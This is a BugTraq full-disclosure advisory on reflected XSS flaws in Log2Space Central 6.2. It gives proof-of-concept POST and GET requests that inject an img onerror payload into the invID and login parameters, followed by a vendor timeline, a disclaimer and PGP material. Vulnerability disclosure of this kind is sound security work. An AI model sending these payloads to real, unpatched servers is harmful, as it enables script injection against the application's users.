BugTraq
Log2Space Central v 6.2 Multiple XSS Vulnerability Jan 27 2016 05:04PM
Rahul Pratap Singh (techno rps gmail com)
## FULL DISCLOSURE

#Product : Log2Space Central
#Exploit Author : Rahul Pratap Singh
#Version : 6.2
#Home page Link :
http://www.spacecom.co.in/log2spacecentralserver_overview.html
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"invID, login, UserName, DayFrom, MonthFrom, YearFrom, DayTo, MonthTo,
YearTo, usage" parameters are not sanitized that leads to Reflected XSS.

----------------------------------------
Exploit:
----------------------------------------
Send following Post request: (unauthenticated)

POST /cgi/login.php

txtLogin=xss&txtLoginPass=xss&Submit=Login&invID="/><img src=x
onerror=alert(1)>"&recID=

Send following Get request: (authenticated)

GET
/cgi/activation.php?pageRef=user&login="/><img%20src=x%20onerror=alert(1
)>%20"

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/ualog2spacecentralxss.png

Fix:
This version is already patched according to Vendor.

Vulnerability Disclosure Timeline:
â?? January 18, 2015 â?? Bug discovered, initial report to Vendor
â?? January 19, 2015 â?? Vendor acknowledged, version already patched
(reported server not updated)
â?? January 19, 2015 â?? Vendor asked for the affected server IP.
â?? January 20, 2015 â?? Affected server IP, reported.
â?? January 25, 2015 â?? Affected Server Patched.

Pub ref:
https://0x62626262.wordpress.com/2016/01/27/log2space-central-v-6-2-mult
iple-xss-vulnerability

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)

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
y0V0JgTl31Qj30kCJGsmmTu3IEQ=
=W24W
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)

iQIcBAEBAgAGBQJWqPi1AAoJEJvdRneaz31fwLIP/38GRG7ueZAQAJjNB9Eb/+D2
07ABbpfjhCKt90Da4Yq8fNQinO33oqvu5+G+Xs8aLoCIImyOn/3LUd7NWUxTCRzI
wFgKRi8NVi7RrY8+sHyCCf+mBx4oiHaG7IQHTTqbVUXVTIL11Yg5IYdZiVFABmG6
zrWgbdszVSYbu0rSJw/rSAMw6BErNI+sOAxe3AHwmqUo05++Rvzv2jk/CYbwKCA2
wvVE4vFAFPzd5SgbcvF/IVK9F7RyJW2bP4TVw2a7Aa4yGhd4+zTJSj2O6DwXZ4G9
vYlPMdg4udlxlUoya0YmvVR+s1ph2Hx/gA69OziZTJ2IGmCVTkqrZva7OsXxRDrY
LKs90eDOR6TyRERN3EnTHEqsz+KpxjWodA1EjKU+gBK2WBBJetsA8sGJRkfq+HxB
GpGtWsA4m76B6cBdRtX5UArg7gP4ih9IrSTOoFG6MR4IG4jj4y1eBY0W+UNihvvS
4p2jw7lXrt8WwwrVFzgzyegTgt2qSrhZP1y4xcz/z40cF9xngRFb49oFqpee7JhX
gSjOHDbciOnOcwuvcFclBzuqUb1enKlP0w2DjOCWXtY4lO6LOXLc4dxvMguUZKZh
e+CuZ6mobE1HCbIarcdYtHfzu2Nf+sFhiqZA+CkwNo9KmdgvSy3HHnqtHYomzT1n
p9fTxdlhNlM9qn3zoDlG
=v72n
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus